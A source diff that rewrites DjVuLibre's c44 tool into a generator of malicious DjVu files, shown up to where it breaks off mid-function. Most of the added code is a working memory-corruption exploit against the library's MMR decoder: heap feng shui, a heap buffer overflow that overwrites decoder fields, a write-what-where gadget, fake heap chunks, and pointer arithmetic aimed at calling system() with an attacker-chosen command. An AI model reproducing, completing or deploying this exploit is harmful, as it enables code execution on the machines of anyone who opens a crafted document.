b/config/acinclude.m4 +@@ -96,8 +96,8 @@ AC_DEFUN([AC_OPTIMIZE],[ + AC_REMOVE_OPTIONS([CXXFLAGS],[-g*]) + fi + defines="-DNDEBUG" +- AC_CHECK_CC_OPT([-O3],,[AC_CHECK_CC_OPT([-O2])]) +- AC_CHECK_CXX_OPT([-O3],,[AC_CHECK_CXX_OPT([-O2])]) ++ AC_CHECK_CC_OPT([-O0],,[AC_CHECK_CC_OPT([-O0])]) ++ AC_CHECK_CXX_OPT([-O0],,[AC_CHECK_CXX_OPT([-O0])]) + cpu=`uname -m 2>/dev/null` + test -z "$cpu" && cpu=${host_cpu} + case "${host_cpu}" in +diff --git a/libdjvu/JB2EncodeCodec.cpp b/libdjvu/JB2EncodeCodec.cpp +index 8b3671c..63c70aa 100644 +--- a/libdjvu/JB2EncodeCodec.cpp ++++ b/libdjvu/JB2EncodeCodec.cpp +@@ -377,6 +377,13 @@ JB2Dict::JB2Codec::Encode::code(const GP &gjim) + for (shapeno=firstshape; shapeno= 0) +@@ -390,6 +397,13 @@ JB2Dict::JB2Codec::Encode::code(const GP &gjim) + code_record(rectype, 0, 0); + } + } ++ if (jim.encode_shape_cb) { ++ jim.encode_shape_cb(); ++ } ++ // Code Comment. ++ rectype = PRESERVED_COMMENT; ++ if (!! jim.comment) ++ code_record(rectype, gjim, 0); + // Code end of data record + rectype = END_OF_DATA; + code_record(rectype, gjim, 0); +diff --git a/libdjvu/JB2Image.h b/libdjvu/JB2Image.h +index a87a83b..b88923b 100644 +--- a/libdjvu/JB2Image.h ++++ b/libdjvu/JB2Image.h +@@ -170,6 +170,7 @@ + + #include "GString.h" + #include "ZPCodec.h" ++#include "functional" + + + #ifdef HAVE_NAMESPACES +@@ -318,6 +319,9 @@ public: + /** Comment string coded by JB2 file. */ + GUTF8String comment; + ++ // Extra callback during encoding, so that I can modify the comment. ++ std::function encode_shape_cb = {}; ++ + + private: + friend class JB2Codec; +diff --git a/tools/c44.cpp b/tools/c44.cpp +index df73468..145caff 100644 +--- a/tools/c44.cpp ++++ b/tools/c44.cpp +@@ -211,6 +211,8 @@ + //@{ + //@} + ++#include ++#include + #include "GString.h" + #include "GException.h" + #include "IW44Image.h" +@@ -223,566 +225,1267 @@ + #include "DjVuMessage.h" + #include "JPEGDecoder.h" + #include "common.h" ++#include "JB2Image.h" ++#include ++#include ++#include + +-// command line data +- +-int flag_mask = 0; +-int flag_bpp = 0; +-int flag_size = 0; +-int flag_percent = 0; +-int flag_slice = 0; +-int flag_decibel = 0; +-int flag_crcbdelay = -1; +-int flag_crcbmode = -1; +-double flag_dbfrac = -1; +-int flag_dpi = -1; +-double flag_gamma = -1; +-int argc_bpp = 0; +-int argc_size = 0; +-int argc_slice = 0; +-int argc_decibel = 0; +-IW44Image::CRCBMode arg_crcbmode = IW44Image::CRCBnormal; +- +-#define MAXCHUNKS 64 +-float argv_bpp[MAXCHUNKS]; +-int argv_size[MAXCHUNKS]; +-int argv_slice[MAXCHUNKS]; +-float argv_decibel[MAXCHUNKS]; +- +-struct C44Global +-{ +- // Globals that need static initialization +- // are grouped here to work around broken compilers. +- GURL pnmurl; +- GURL iw4url; +- GURL mskurl; +- IWEncoderParms parms[MAXCHUNKS]; +-}; +- +-static C44Global& g(void) +-{ +- static C44Global g; +- return g; +-} +- +- +-// parse arguments +- +-void +-usage() +-{ +- DjVuPrintErrorUTF8( +-#ifdef DJVULIBRE_VERSION +- "C44 --- DjVuLibre-" DJVULIBRE_VERSION "\n" +-#endif +- "Image compression utility using IW44 wavelets\n\n" +- "Usage: c44 [options] pnm-or-jpeg-file [djvufile]\n" +- "Options:\n" +- " -slice n+...+n -- select an increasing sequence of data slices\n" +- " expressed as integers ranging from 1 to 140.\n" +- " -bpp n,..,n -- select a increasing sequence of bitrates\n" +- " for building progressive file (in bits per pixel).\n" +- " -size n,..,n -- select an increasing sequence of minimal sizes\n" +- " for building progressive files (expressed in bytes).\n" +- " -percent n,..,n -- selects the percentage of original file size\n" +- " for building progressive file.\n" +- " -decibel n,..,n -- select an increasing sequence of luminance error\n" +- " expressed as decibels (ranging from 16 to 50).\n" +- " -dbfrac frac -- restrict decibel estimation to a fraction of\n" +- " the most misrepresented 32x32 blocks\n" +- " -mask pbmfile -- select bitmask specifying image zone to encode\n" +- " with minimal bitrate. (default none)\n" +- " -dpi n -- sets the image resolution\n" +- " -gamma n -- sets the image gamma correction\n" +- " -crcbfull -- encode chrominance with highest quality\n" +- " -crcbnormal -- encode chrominance with normal resolution (default)\n" +- " -crcbhalf -- encode chrominance with half resolution\n" +- " -crcbnone -- do not encode chrominance at all\n" +- " -crcbdelay n -- select chrominance coding delay (default 10)\n" +- " for -crcbnormal and -crcbhalf modes\n" +- "\n"); +- exit(1); +-} +- +- +- +-void +-parse_bpp(const char *q) +-{ +- flag_bpp = 1; +- argc_bpp = 0; +- double lastx = 0; +- while (*q) +- { +- char *ptr; +- double x = strtod(q, &ptr); +- if (ptr == q) +- G_THROW( ERR_MSG("c44.bitrate_not_number") ); +- if (lastx>0 && q[-1]=='+') +- x += lastx; +- if (x<=0 || x>24 || x=MAXCHUNKS) +- G_THROW( ERR_MSG("c44.bitrate_too_many") ); +- } +- if (argc_bpp < 1) +- G_THROW( ERR_MSG("c44.bitrate_no_chunks") ); +-} +- +- +-void +-parse_size(const char *q) +-{ +- flag_size = 1; +- argc_size = 0; +- int lastx = 0; +- while (*q) +- { +- char *ptr; +- int x = strtol(q, &ptr, 10); +- if (ptr == q) +- G_THROW( ERR_MSG("c44.size_not_number") ); +- if (lastx>0 && q[-1]=='+') +- x += lastx; +- if (x=MAXCHUNKS) +- G_THROW( ERR_MSG("c44.size_too_many") ); +- } +- if (argc_size < 1) +- G_THROW( ERR_MSG("c44.size_no_chunks") ); +-} +- +-void +-parse_slice(const char *q) +-{ +- flag_slice = 1; +- argc_slice = 0; +- int lastx = 0; +- while (*q) +- { +- char *ptr; +- int x = strtol(q, &ptr, 10); +- if (ptr == q) +- G_THROW( ERR_MSG("c44.slice_not_number") ); +- if (lastx>0 && q[-1]=='+') +- x += lastx; +- if (x<1 || x>1000 || x=MAXCHUNKS) +- G_THROW( ERR_MSG("c44.slice_too_many") ); +- } +- if (argc_slice < 1) +- G_THROW( ERR_MSG("c44.slice_no_chunks") ); +-} +- +- +-void +-parse_decibel(const char *q) +-{ +- flag_decibel = 1; +- argc_decibel = 0; +- double lastx = 0; +- while (*q) +- { +- char *ptr; +- double x = strtod(q, &ptr); +- if (ptr == q) +- G_THROW( ERR_MSG("c44.decibel_not_number") ); +- if (lastx>0 && q[-1]=='+') +- x += lastx; +- if (x<16 || x>50 || x=MAXCHUNKS) +- G_THROW( ERR_MSG("c44.decibel_too_many") ); ++static void djbz_bitmap(JB2Dict &d, int nrows, int ncols, int bytes_per_row) { ++ JB2Shape shape; ++ shape.parent = -1; ++ shape.userdata = 0; ++ shape.bits = GBitmap::create(nrows, ncols, 4); ++ for (int i = 0; i < nrows; i++) { ++ for (int j = 0; j < ncols; j++) { ++ (*shape.bits)[i][j] = ++ j + 1 < bytes_per_row ? (j & 1) : (bytes_per_row & 1); + } +- if (argc_decibel < 1) +- G_THROW( ERR_MSG("c44.decibel_no_chunks") ); +-} +- +- +-int +-resolve_quality(int npix) +-{ +- // Convert ratio specification into size specification +- if (flag_bpp) +- { +- if (flag_size) +- G_THROW( ERR_MSG("c44.exclusive") ); +- flag_size = flag_bpp; +- argc_size = argc_bpp; +- for (int i=0; i 0); ++ buf[0] = 0; ++ } ++ ++ size_t bitoffset() const { return offset_; } ++ size_t byteoffset() const { return (offset_ + 7) / 8; } ++ ++ void write(uint8_t x, size_t nbits); ++ ++private: ++ void write_bitcode(const BitCode table[], size_t tablelen, uint32_t value); ++ ++public: ++ void write_wcode(uint32_t value) { ++ write_bitcode(wcodes, sizeof(wcodes) / sizeof(BitCode), value); ++ } ++ ++ void write_bcode(uint32_t value) { ++ write_bitcode(bcodes, sizeof(bcodes) / sizeof(BitCode), value); ++ } ++}; ++ ++void BitPacker::write(uint8_t x, size_t nbits) { ++ assert(nbits <= 8); ++ assert(x >> nbits == 0); ++ ++ // Shift bits to the top of the byte. ++ x <<= (8 - nbits); ++ ++ // The number of bits that have already been written to the current byte. ++ // Note: bits are written to the top of the byte first. ++ const size_t occupied = offset_ % 8; ++ ++ buf_[offset_ / 8] |= (x >> occupied); ++ offset_ += nbits; ++ if (occupied + nbits >= 8) { ++ if (offset_ / 8 >= bufsize_) { ++ G_THROW(ERR_MSG("BitPacker: buffer too small")); + } +- // Complete short specifications +- while (argc_size < nchunk) +- argv_size[argc_size++] = 0; +- while (argc_slice < nchunk) +- argv_slice[argc_slice++] = 0; +- while (argc_decibel < nchunk) +- argv_decibel[argc_decibel++] = 0.0; +- // Fill parm structure +- for(int i=0; i value) { ++ high = mid; ++ } else { ++ low = mid + 1; ++ } + } +- // Return number of chunks +- return nchunk; +-} +- +- +-void +-parse(GArray &argv) +-{ +- const int argc=argv.hbound()+1; +- for (int i=1; i= argc) +- G_THROW( ERR_MSG("c44.no_bpp_arg") ); +- if (flag_bpp || flag_size) +- G_THROW( ERR_MSG("c44.multiple_bitrate") ); +- parse_size(argv[i]); +- flag_percent = 1; +- } +- else if (argv[i] == "-bpp") +- { +- if (++i >= argc) +- G_THROW( ERR_MSG("c44.no_bpp_arg") ); +- if (flag_bpp || flag_size) +- G_THROW( ERR_MSG("c44.multiple_bitrate") ); +- parse_bpp(argv[i]); +- } +- else if (argv[i] == "-size") +- { +- if (++i >= argc) +- G_THROW( ERR_MSG("c44.no_size_arg") ); +- if (flag_bpp || flag_size) +- G_THROW( ERR_MSG("c44.multiple_size") ); +- parse_size(argv[i]); +- } +- else if (argv[i] == "-decibel") +- { +- if (++i >= argc) +- G_THROW( ERR_MSG("c44.no_decibel_arg") ); +- if (flag_decibel) +- G_THROW( ERR_MSG("c44.multiple_decibel") ); +- parse_decibel(argv[i]); +- } +- else if (argv[i] == "-slice") +- { +- if (++i >= argc) +- G_THROW( ERR_MSG("c44.no_slice_arg") ); +- if (flag_slice) +- G_THROW( ERR_MSG("c44.multiple_slice") ); +- parse_slice(argv[i]); +- } +- else if (argv[i] == "-mask") +- { +- if (++i >= argc) +- G_THROW( ERR_MSG("c44.no_mask_arg") ); +- if (! g().mskurl.is_empty()) +- G_THROW( ERR_MSG("c44.multiple_mask") ); +- g().mskurl = GURL::Filename::UTF8(argv[i]); +- } +- else if (argv[i] == "-dbfrac") +- { +- if (++i >= argc) +- G_THROW( ERR_MSG("c44.no_dbfrac_arg") ); +- if (flag_dbfrac>0) +- G_THROW( ERR_MSG("c44.multiple_dbfrac") ); +- char *ptr; +- flag_dbfrac = strtod(argv[i], &ptr); +- if (flag_dbfrac<=0 || flag_dbfrac>1 || *ptr) +- G_THROW( ERR_MSG("c44.illegal_dbfrac") ); +- } +- else if (argv[i] == "-crcbnone") +- { +- if (flag_crcbmode>=0 || flag_crcbdelay>=0) +- G_THROW( ERR_MSG("c44.incompatable_chrominance") ); +- flag_crcbdelay = flag_crcbmode = 0; +- arg_crcbmode = IW44Image::CRCBnone; +- } +- else if (argv[i] == "-crcbhalf") +- { +- if (flag_crcbmode>=0) +- G_THROW( ERR_MSG("c44.incompatable_chrominance") ); +- flag_crcbmode = 0; +- arg_crcbmode = IW44Image::CRCBhalf; +- } +- else if (argv[i] == "-crcbnormal") +- { +- if (flag_crcbmode>=0) +- G_THROW( ERR_MSG("c44.incompatable_chrominance") ); +- flag_crcbmode = 0; +- arg_crcbmode = IW44Image::CRCBnormal; +- } +- else if (argv[i] == "-crcbfull") +- { +- if (flag_crcbmode>=0 || flag_crcbdelay>=0) +- G_THROW( ERR_MSG("c44.incompatable_chrominance") ); +- flag_crcbdelay = flag_crcbmode = 0; +- arg_crcbmode = IW44Image::CRCBfull; +- } +- else if (argv[i] == "-crcbdelay") +- { +- if (++i >= argc) +- G_THROW( ERR_MSG("c44.no_crcbdelay_arg") ); +- if (flag_crcbdelay>=0) +- G_THROW( ERR_MSG("c44.incompatable_chrominance") ); +- char *ptr; +- flag_crcbdelay = strtol(argv[i], &ptr, 10); +- if (*ptr || flag_crcbdelay<0 || flag_crcbdelay>=100) +- G_THROW( ERR_MSG("c44.illegal_crcbdelay") ); +- } +- else if (argv[i] == "-dpi") +- { +- if (++i >= argc) +- G_THROW( ERR_MSG("c44.no_dpi_arg") ); +- if (flag_dpi>0) +- G_THROW( ERR_MSG("c44.duplicate_dpi") ); +- char *ptr; +- flag_dpi = strtol(argv[i], &ptr, 10); +- if (*ptr || flag_dpi<25 || flag_dpi>4800) +- G_THROW( ERR_MSG("c44.illegal_dpi") ); +- } +- else if (argv[i] == "-gamma") +- { +- if (++i >= argc) +- G_THROW( ERR_MSG("c44.no_gamma_arg") ); +- if (flag_gamma > 0) +- G_THROW( ERR_MSG("c44.duplicate_gamma") ); +- char *ptr; +- flag_gamma = strtod(argv[i], &ptr); +- if (*ptr || flag_gamma<=0.25 || flag_gamma>=5) +- G_THROW( ERR_MSG("c44.illegal_gamma") ); +- } +- else +- usage(); +- } +- else if (g().pnmurl.is_empty()) +- g().pnmurl = GURL::Filename::UTF8(argv[i]); +- else if (g().iw4url.is_empty()) +- g().iw4url = GURL::Filename::UTF8(argv[i]); +- else +- usage(); ++ assert(high > 0); ++ const size_t i = high - 1; ++ assert(table[i].value <= value); ++ if (table[i].codelen > 8) { ++ write(0, table[i].codelen - 8); ++ write(table[i].code, 8); ++ } else { ++ write(table[i].code, table[i].codelen); + } +- if (g().pnmurl.is_empty()) +- usage(); +- if (g().iw4url.is_empty()) +- { +- GURL codebase=g().pnmurl.base(); +- GUTF8String base = g().pnmurl.fname(); +- int dot = base.rsearch('.'); +- if (dot >= 1) +- base = base.substr(0,dot); +- const char *ext=".djvu"; +- g().iw4url = GURL::UTF8(base+ext,codebase); ++ if (value < 64) { ++ break; + } ++ value -= table[i].value; ++ } + } + ++// The heap feng shui phase aims to preload the tcache with several ++// chunks that are next to each other in memory, and that will get ++// used later when jimg, prevruns, lineruns, and dcd are ++// allocated. So, even though the exact offsets of these chunks within ++// the thread-local arena are unreliable, the distances between them ++// should be. ++static const uint16_t distance_jimg_to_dcd = 0x700; ++static const uint16_t distance_prevruns_to_dcd = 0x590; ++static const uint16_t distance_lineruns_to_dcd = 0x370; + ++static const uint16_t sizeof_fake_chunk = 0xa0; ++static const uint16_t sizeof_GBitmap = 0x80; + +-GP +-getmask(int w, int h) +-{ +- GP msk8; +- if (! g().mskurl.is_empty()) +- { +- GP mbs=ByteStream::create(g().mskurl,"rb"); +- msk8 = GBitmap::create(*mbs); +- if (msk8->columns() != (unsigned int)w || +- msk8->rows() != (unsigned int)h ) +- G_THROW( ERR_MSG("c44.different_size") ); +- } +- return msk8; ++// The heap feng shui stage allocates a lot of memory that will never ++// be used again in the 0x31000..0x38000 range (appoximately) of the ++// thread-local arena, so I can use it as a scratch area for things ++// like creating fake chunks. The exact offsets might vary slightly ++// from one run to the next, but it should be very reliable if I stay ++// away from the edges. ++static const uint16_t offsetof_scratch_area = 0x2000; ++ ++// Location for storing a pointer to dcd, so that I can calculate ++// pointers to jimg or dcd whenever I need to. ++static const uint16_t offsetof_dcd_ptr_backup = offsetof_scratch_area + 0x20; ++ ++static const uint16_t offsetof_fake_bytes_data = offsetof_dcd_ptr_backup + 0x10; ++static const uint16_t offsetof_fake_rlerows = offsetof_fake_bytes_data + 0x10; ++static const uint16_t offsetof_scratch_ptr = offsetof_fake_rlerows + 0x30; ++ ++// Locations for storing the components of an arena pointer, so ++// that I can use copy_uint16 to forge fake pointers. ++static const uint16_t arena_ptrbytes_2_3 = offsetof_scratch_ptr + 0x30; ++static const uint16_t arena_ptrbytes_4_5 = arena_ptrbytes_2_3 + 0x10; ++ ++// Locations for storing the components of the jimg->blits.traits ++// pointer, so that I can use copy_uint16 to reconstruct it later. ++static const uint16_t traits_ptrbytes_0_1 = arena_ptrbytes_4_5 + 0x10; ++static const uint16_t traits_ptrbytes_2_3 = traits_ptrbytes_0_1 + 0x10; ++static const uint16_t traits_ptrbytes_4_5 = traits_ptrbytes_2_3 + 0x10; ++ ++// Scratch area for the add-with-carry operation. ++static const uint16_t offsetof_adder_area = traits_ptrbytes_4_5 + 0x20; ++ ++static const uint16_t offsetof_fake_bitmap = offsetof_adder_area + 0x20; ++static const uint16_t offsetof_fake_chunk1 = ++ offsetof_fake_bitmap + sizeof_GBitmap + 0x10; ++static const uint16_t offsetof_fake_chunk2 = ++ offsetof_fake_chunk1 + sizeof_fake_chunk + 0x10; ++ ++static const uint16_t offsetof_scratch_area_end = ++ offsetof_fake_chunk2 + sizeof_fake_chunk + 0x30; ++ ++// Location where I'll write the command for system to run. ++// fake_chunk2 contains the fake traits when the command is written. ++// The fake traits are 0x28 bytes, so 0x40 is enough of a gap. ++static const uint16_t offsetof_command = offsetof_fake_chunk2 + 0x40; ++ ++// Struct field offsets ++static const uint16_t offsetof_dcd_count = 0x8; ++static const uint16_t offsetof_dcd_width = 0xc; ++static const uint16_t offsetof_dcd_lineruns = 0x38; ++static const uint16_t offsetof_dcd_prevruns = 0x50; ++ ++static const uint16_t offsetof_blits_traits = 0x78; ++static const uint16_t offsetof_blits_data = 0x80; ++ ++static const uint16_t offsetof_bytes = 0x18; ++static const uint16_t offsetof_bytes_data = 0x20; ++static const uint16_t offsetof_rle = 0x38; ++static const uint16_t offsetof_grle = 0x40; ++static const uint16_t offsetof_grlerows = 0x58; ++static const uint16_t offsetof_rlelength = 0x68; ++static const uint16_t offsetof_monitorptr = 0x70; ++ ++static void write_V0(BitPacker &packer) { ++ packer.write(1, 1); // V0 ++} ++ ++static void write_VL1(BitPacker &packer) { ++ packer.write(0x2, 3); // VL1 ++} ++ ++static void write_P(BitPacker &packer) { ++ packer.write(0x1, 4); // P ++} ++ ++// Write a H element to an even numbered address. ++static void write_H_even(BitPacker &packer, uint32_t lo, uint32_t hi) { ++ packer.write(1, 3); // H ++ packer.write_wcode(lo); ++ packer.write_bcode(hi); + } + ++// Write a H element to an odd numbered address. ++static void write_H_odd(BitPacker &packer, uint32_t lo, uint32_t hi) { ++ packer.write(1, 3); // H ++ packer.write_bcode(lo); ++ packer.write_wcode(hi); ++} ++ ++static void firstrun(BitPacker &packer, size_t &lineno, uint32_t width, ++ uint16_t blocksize, uint16_t blocksperline) { ++ uint32_t remainder = width; ++ for (uint16_t i = 0; i + 1 < blocksperline; i++) { ++ write_H_even(packer, 0, blocksize); ++ remainder -= blocksize; ++ } ++ write_H_even(packer, 0, remainder); ++ lineno++; ++} ++ ++static void write_stop(BitPacker &packer, size_t &lineno, uint32_t stop) { ++ write_H_even(packer, stop, 0x0); ++ lineno++; ++} ++ ++static void modify_prevruns(BitPacker &packer, size_t &lineno, uint16_t target, ++ uint32_t stop) { ++ write_VL1(packer); ++ write_H_odd(packer, 0x0, 0x0); ++ write_H_odd(packer, 0x0, 0x0); ++ write_H_odd(packer, 0x0, 0x0); ++ write_H_odd(packer, 0x0, stop | target); ++ lineno++; ++} ++ ++// Copy a uint16_t from one location to another. The 8 bytes below it ++// in memory will get trashed. At the destination site, (up to) 12 ++// bytes of garbage get written above it, but not below. Therefore, ++// this operation can be used to move an arbitrary number of bytes ++// from one location to another. (The number of bytes must be even ++// though.) The move is destructive to the source if you want to copy ++// more than 2 bytes, because the bytes below the current ones keep ++// getting trashed. The solution is to move the bytes to a staging ++// area where they're separated by extra zeros and then copy them back ++// later. ++// ++// The advantage of using this function to copy a uint16_t is that it ++// is able to handle the special case where the value is zero. If you ++// know that the value is non-zero then there are simpler ways to copy ++// it. For example, in many places I'm able to copy a pointer in one ++// go, using three V0 instructions, because the heap feng shui has ++// ensured that none of the byte pairs in the pointer are zero. But ++// when I'm copying a fully unknown pointer, like a pointer to ++// system(), then there's a chance that the middle byte pair will be ++// zero due to ASLR. ++// ++// Zero is an awkward special case due to the complicated way that b1 ++// is updated in MMRDecoder::scanruns(). The solution is to add 1 to ++// the number and then subtract it with the VL1 operation. This ++// involves adding two extra steps, so this function uses 6 steps ++// rather than 4. ++static void copy_uint16(BitPacker &packer, size_t &lineno, uint16_t src, ++ uint16_t dst) { ++ // 1 ++ // Modify prevruns. ++ write_VL1(packer); ++ write_H_odd(packer, 0x0, 0x0); ++ write_H_odd(packer, 0x0, 0x0); ++ write_H_odd(packer, 0x0, 0x0); ++ write_H_odd(packer, 0x0, 0x40000 | (src - 8)); ++ lineno++; ++ ++ // 2 ++ // Write 0x0000, 0x0000, 0x0000, 0x0001 below the bytes that I want ++ // to copy. The 0x0001 is a workaround for the special case where ++ // the uint16_t that I want to copy is zero. The 0x0001 gets added ++ // to the uint16_t and then subtracted by the VL1 operation in the ++ // next step. ++ write_H_even(packer, 0x0, 0x0); ++ write_H_even(packer, 0x0, 0x40001); ++ lineno++; ++ ++ // 3 ++ // Copy byte pair back and modify prevruns so that I can copy them ++ // to the destination. ++ write_H_even(packer, 0x0, 0x0); ++ write_H_even(packer, 0x0, 0x0); ++ write_VL1(packer); ++ write_H_odd(packer, 0x0, 0x0); ++ write_H_odd(packer, 0x0, 0x40000 | dst); ++ lineno++; ++ ++ // 4 ++ // skip step at destination ++ write_H_even(packer, 0x0, 0x40000); ++ lineno++; ++ ++ // 5 ++ // Write a 1 below the bytes so that I can do the same trick as ++ // before. ++ write_H_even(packer, 0x0, 0x0); ++ write_H_even(packer, 0x0, 0x40001); ++ lineno++; ++ ++ // 6 ++ // Copy to dst ++ write_P(packer); ++ write_VL1(packer); ++ write_H_odd(packer, 0xc000, 0xc000); ++ write_H_odd(packer, 0xc000, 0xc000); ++ lineno++; ++} + +-static void +-create_photo_djvu_file(IW44Image &iw, int w, int h, +- IFFByteStream &iff, int nchunks, IWEncoderParms xparms[]) +-{ ++// Add two uint16_t values and also output a carry bit. The two input ++// values should be stored at p, p+2 before calling this function. The ++// carry bit will be written to p-2 and the addition result to p+10. ++// ++// The 16 bytes below dcd.prevruns are used as a working area. ++// ++// The addition is computed by this loop: ++// (https://sourceforge.net/p/djvu/djvulibre-git/ci/42029c33b2fb25bc1fa98c80b2be83a2fa23cce1/tree/libdjvu/MMRDecoder.cpp#l748) ++// ++// // Next reference run ++// for(;b1<=a0 && b1= 0x10000 (i.e. if there's a carry bit). That second ++// iteration adds another 0x10000, so it doesn't change the output. ++// But it means that pr has been incremented 4 bytes more than if ++// there was no carry. The next instruction is a V0, which will output ++// a 2 if there was a carry or 1 if there wasn't. (It's easier to copy ++// a non-zero value so that's why I use 1,2 rather than 0,1.) ++static void add_with_carry(BitPacker &packer, size_t &lineno, uint16_t p) { ++ // 1 ++ // Point prevruns just above the two values ++ write_VL1(packer); ++ write_H_odd(packer, 0x0, 0x0); ++ write_H_odd(packer, 0x0, 0x0); ++ write_H_odd(packer, 0x0, 0x0); ++ write_H_odd(packer, 0x40000, p + 4); ++ lineno++; ++ ++ // 2 ++ // Write some values that will compute the carry bit. ++ write_H_even(packer, 0x2, 0xfffe); // sum == 0x10000 ++ write_H_even(packer, 0x1, 0x0); ++ write_H_even(packer, 0x0, 0x1ffff); ++ lineno++; ++ ++ // 3 ++ // Point prevruns 6 bytes below the two values ++ write_VL1(packer); ++ write_H_odd(packer, 0x0, 0x0); ++ write_H_odd(packer, 0x0, 0x0); ++ write_H_odd(packer, 0x0, 0x0); ++ write_H_odd(packer, 0x40000, p - 6); ++ lineno++; ++ ++ // 4 ++ // write zeros below the two values ++ write_VL1(packer); ++ write_H_odd(packer, 0x0, 0x40000); ++ lineno++; ++ ++ // 5 ++ // Compute the addition and write the carry bit ++ write_H_even(packer, 0x0, 0x0); ++ write_H_even(packer, 0x0, 0xffff); ++ write_V0(packer); ++ write_V0(packer); ++ write_H_even(packer, 0xffff, 0x40000); ++ lineno++; ++ ++ // 6 ++ // Copy the addition result out ++ write_H_even(packer, 0x0, 0x0); ++ write_H_even(packer, 0x0, 0x0); ++ write_H_even(packer, 0x0, 0x0); ++ write_H_even(packer, 0x0, 0x0); ++ write_V0(packer); ++ write_H_odd(packer, 0x0, 0x40000); ++ lineno++; ++ ++ // 7 ++ // wipe the addition result ++ write_VL1(packer); ++ write_H_odd(packer, 0x0, 0x0); ++ write_H_odd(packer, 0x0, 0x40000); ++ lineno++; ++ ++ // 8 ++ // Copy the carry bit out ++ write_H_even(packer, 0x0, 0x0); ++ write_V0(packer); ++ write_H_odd(packer, 0x0, 0x40000); ++ lineno++; ++} ++ ++// Adds a uint16_t increment to a 64-bit pointer. ++static void pointer_add(BitPacker &packer, size_t &lineno, uint16_t src, ++ uint16_t dst, uint16_t incr, ++ bool write_trailer = true) { ++ // Scratch area for add_with_carry to use ++ uint16_t s = offsetof_adder_area; ++ ++ // Copy increment to scratch area ++ modify_prevruns(packer, lineno, s - 6, 0x40000); ++ write_H_even(packer, 0x0, 0x0); ++ write_H_even(packer, 0x40000, incr); ++ lineno++; ++ ++ // Copy components. Only 3 iterations are needed because the top two ++ // bytes of a pointer are always zero. ++ for (size_t i = 0; i < 3; i++) { ++ // Copy component to scratch area ++ copy_uint16(packer, lineno, src, s + 2); ++ ++ // Add increment or carry bit to component ++ add_with_carry(packer, lineno, s); ++ ++ // Copy result out ++ copy_uint16(packer, lineno, s + 10, dst); ++ ++ // Carry bit was written to s-2, so it's easiest to shift the scratch area. ++ s -= 2; ++ ++ // Move to next component ++ src += 2; ++ dst += 2; ++ } ++} ++ ++// Use the buffer overflow on dcd->lineruns to modify ++// dcd->width. (Heap feng shui has ensured that lineruns is stored ++// immediately below dcd in memory.) This function should be followed ++// by a call to write_stop(). ++static void overwrite_width(BitPacker &packer, uint16_t prefixlen) { ++ // Buffer overflow ++ for (size_t i = prefixlen; i < distance_lineruns_to_dcd + offsetof_dcd_width; ++ i += 4) { ++ write_H_even(packer, 0x0, 0x0); ++ } ++ ++ // Overwrite width ++ write_H_even(packer, 0x0, 0x3); // 0x30000 ++ ++ // Overwrite height ++ write_H_even(packer, 0x0, 0x1); // 0x10000 ++ ++ // Overwrite lineno ++ write_H_even(packer, 0x0, 0x0); ++ ++ // Overwrite striplineno ++ write_H_even(packer, 0x0, 0x0); ++ ++ // Overwrite rowsperstrip ++ write_H_even(packer, 0x0, 0x1); // 0x10000 ++ ++ // Overwrite line and gline ++ write_H_even(packer, 0x0, 0x0); ++ write_H_even(packer, 0x0, 0x0); ++ write_H_even(packer, 0x0, 0x0); ++ write_H_even(packer, 0x0, 0x0); ++ write_H_even(packer, 0x0, 0x0); ++} ++ ++// This overwrites dcd->lineruns with a pointer to dcd->glineruns. ++// That gives me the ability to overwrite prevruns, which means I can ++// now write bytes to any location. (Previously, I could also write to ++// any location, but it was a one-shot thing because the only way to ++// do it a second time was by trashing all the memory between the ++// first location and dcd.) ++static void create_write_what_where_gadget(BitPacker &packer, size_t &lineno) { ++ // Almost all the bytes between prevruns and &dcd->lineruns are ++ // currently zero. The exceptions are the handful of non-zero values ++ // that I've set in dcd, such as dcd->width and dcd->height. Also, ++ // lineno and striplineno have both been incremented once since I ++ // zeroed them in overwrite_width(). So at this moment in time, ++ // those values sum to 7. So, in order for the first byte pair of ++ // the pointer to get successfully loaded into b1, I need to set a0 ++ // = 7. ++ write_H_even(packer, 0x0, 0x7); ++ write_H_even(packer, 0x0, 0x0); ++ write_V0(packer); ++ write_V0(packer); ++ write_V0(packer); ++ write_H_odd(packer, 0x0, 0x40000); // stop ++ lineno++; ++ ++ // skip line ++ write_stop(packer, lineno, 0x40000); ++ ++ // write large number below the address in prevruns ++ write_H_even(packer, 0x0, 0x0); ++ write_H_even(packer, 0x0, 0x50000 - 0x1); ++ lineno++; ++ ++ // Next line. ++ write_H_even(packer, 0x0, ++ 0x10000 - ++ (distance_prevruns_to_dcd + offsetof_dcd_lineruns + 0xe)); ++ overwrite_width(packer, 0x4); ++ write_H_even(packer, 0x0, 0x0); ++ write_V0(packer); ++ write_V0(packer); ++ write_V0(packer); ++ write_H_odd(packer, 0x0, 0x30000); // stop ++ lineno++; ++ ++ // skip line ++ write_stop(packer, lineno, 0x40000); ++ ++ // At this moment, dcd still points to the original prevruns, but ++ // dcd->lineruns now points to &dcd->glineruns, which is 0x10 bytes below ++ // &dcd->prevruns in memory. ++} ++ ++// Write n zero bytes at destination. n should be a multiple of 4. ++static void wipe_bytes_at_dst(BitPacker &packer, size_t &lineno, uint16_t dst, ++ size_t n, uint32_t stop) { ++ if (n % 4 != 0) { ++ G_THROW(ERR_MSG("wipe_bytes_at_dst: n is not a multiple of 4")); ++ } ++ ++ // Set target pointer. ++ modify_prevruns(packer, lineno, dst, stop); ++ ++ for (size_t i = 0; i + 4 < n; i += 4) { ++ write_H_even(packer, 0x0, 0x0); ++ } ++ write_stop(packer, lineno, stop); ++} ++ ++// Write a pointer to dcd in the scratch area so that I can retrieve it ++// when I need it. ++static void make_backup_ptr(BitPacker &packer, size_t &lineno) { ++ // Set target pointer. ++ modify_prevruns(packer, lineno, offsetof_dcd_ptr_backup - 0x8, 0x40000); ++ ++ // This will copy the pointer that is currently stored in dcd->prevruns, ++ // which is a pointer to 0x10 below &dcd->prevruns. This subtracts an ++ // offset from it to calculate a pointer to dcd. ++ write_H_even(packer, 0x0, offsetof_dcd_prevruns - 0x10); ++ write_H_even(packer, 0x0, 0x0); ++ write_V0(packer); ++ write_V0(packer); ++ write_V0(packer); ++ write_H_odd(packer, 0x0, 0x40000); // stop ++ lineno++; ++} ++ ++// Overwrite prevruns with an address that's at a relatively offset from ++// dcd. This uses the pointer that I've stored at the fixed (relative to ++// the current arena) address offsetof_dcd_ptr_backup. The offset ++// is subtracted. ++static void modify_prevruns_relative(BitPacker &packer, size_t &lineno, ++ uint16_t offset, uint32_t stop) { ++ 